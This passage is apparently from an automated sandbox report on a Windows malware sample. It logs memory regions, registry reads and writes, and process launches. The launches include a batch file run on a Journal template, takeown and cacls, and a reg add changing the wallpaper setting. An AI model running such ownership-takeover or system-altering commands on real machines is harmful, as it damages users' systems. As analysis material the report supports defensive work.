| pagefile_0x0000000004d00000 | 0x04d00000 | 0x04d0ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004d10000 | 0x04d10000 | 0x04d13fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d20000 | 0x04d20000 | 0x04d21fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d20000 | 0x04d20000 | 0x04d23fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004d30000 | 0x04d30000 | 0x04d43fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004d50000 | 0x04d50000 | 0x04d8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d90000 | 0x04d90000 | 0x04e8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004e90000 | 0x04e90000 | 0x04e93fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004ea0000 | 0x04ea0000 | 0x04ea0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004eb0000 | 0x04eb0000 | 0x04eb1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ec0000 | 0x04ec0000 | 0x04efffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f00000 | 0x04f00000 | 0x04f0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f50000 | 0x04f50000 | 0x04f5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005010000 | 0x05010000 | 0x0510ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x05110000 | 0x051cdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000051d0000 | 0x051d0000 | 0x052cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005380000 | 0x05380000 | 0x0538ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05390000 | 0x056c6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x741b0000 | 0x741b7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e670000 | 0x7e670000 | 0x7e76ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e770000 | 0x7e770000 | 0x7e792fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e798000 | 0x7e798000 | 0x7e79afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e79b000 | 0x7e79b000 | 0x7e79dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e79e000 | 0x7e79e000 | 0x7e79efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e79f000 | 0x7e79f000 | 0x7e79ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 72 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 51 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 18 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 56 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 152, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xa0c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0xee0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0x5d8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "Journal.exe" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "Journal.exe" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #16: reg.exe
12
0
| Information | Value |
|---|---|
| ID | #16 |
| File Name | c:\windows\syswow64\reg.exe |
| Command Line | reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:39, Reason: Child Process |
| Unmonitor | End Time: 00:01:45, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x368 |
| Parent PID | 0xe8c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
524
0x
B60
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000005a0000 | 0x005a0000 | 0x005bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005a0000 | 0x005a0000 | 0x005affff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000005b0000 | 0x005b0000 | 0x005b3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x005c1fff | Private Memory | rw |
|
|
|
- |
| reg.exe.mui | 0x005c0000 | 0x005c9fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000005d0000 | 0x005d0000 | 0x005e3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000005f0000 | 0x005f0000 | 0x0062ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000630000 | 0x00630000 | 0x0066ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000670000 | 0x00670000 | 0x00673fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000680000 | 0x00680000 | 0x00680fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000690000 | 0x00690000 | 0x00691fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x006a0000 | 0x0075dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000760000 | 0x00760000 | 0x0079ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007a0000 | 0x007a0000 | 0x007dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000860000 | 0x00860000 | 0x0086ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x00870000 | 0x0094efff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000009f0000 | 0x009f0000 | 0x009fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a50000 | 0x00a50000 | 0x00b4ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00b50000 | 0x00e86fff | Memory Mapped File | r |
|
|
|
- |
| reg.exe | 0x01110000 | 0x01162fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001170000 | 0x01170000 | 0x0516ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x74d30000 | 0x74d8bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x770c0000 | 0x770c6fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e540000 | 0x7e540000 | 0x7e63ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e640000 | 0x7e640000 | 0x7e662fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e667000 | 0x7e667000 | 0x7e669fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e66a000 | 0x7e66a000 | 0x7e66cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e66d000 | 0x7e66d000 | 0x7e66dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e66f000 | 0x7e66f000 | 0x7e66ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (6)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 39 |
|
1 |
Registry (4)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Control Panel\Desktop | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Control Panel\Desktop | value_name = TileWallpaper |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Control Panel\Desktop | value_name = TileWallpaper, data = 0, size = 4, type = REG_SZ |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\reg.exe | base_address = 0x1110000 |
|
1 |
Process #17: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #17 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Journal\Templates\Seyes.jtp"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:43, Reason: Child Process |
| Unmonitor | End Time: 00:02:38, Reason: Self Terminated |
| Monitor Duration | 00:00:55 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb70 |
| Parent PID | 0xa70 (c:\users\ciihmnxmn6ps\desktop\mngrxc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
BAC
0x
B38
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000ce0000 | 0x00ce0000 | 0x04cdffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004ce0000 | 0x04ce0000 | 0x04cfffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ce0000 | 0x04ce0000 | 0x04ceffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004cf0000 | 0x04cf0000 | 0x04cf3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d00000 | 0x04d00000 | 0x04d01fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d00000 | 0x04d00000 | 0x04d03fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004d10000 | 0x04d10000 | 0x04d23fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004d30000 | 0x04d30000 | 0x04d6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d70000 | 0x04d70000 | 0x04e6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004e70000 | 0x04e70000 | 0x04e73fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004e80000 | 0x04e80000 | 0x04e80fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004e90000 | 0x04e90000 | 0x04e91fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ea0000 | 0x04ea0000 | 0x04eaffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004eb0000 | 0x04eb0000 | 0x04ebffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04ec0000 | 0x04f7dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004f80000 | 0x04f80000 | 0x04fbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ff0000 | 0x04ff0000 | 0x04ffffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005020000 | 0x05020000 | 0x0511ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005120000 | 0x05120000 | 0x0521ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05220000 | 0x05556fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x741b0000 | 0x741b7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f160000 | 0x7f160000 | 0x7f25ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f260000 | 0x7f260000 | 0x7f282fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f288000 | 0x7f288000 | 0x7f28afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f28b000 | 0x7f28b000 | 0x7f28dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f28e000 | 0x7f28e000 | 0x7f28efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f28f000 | 0x7f28f000 | 0x7f28ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 80 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 59 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 16 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 54 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 150, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
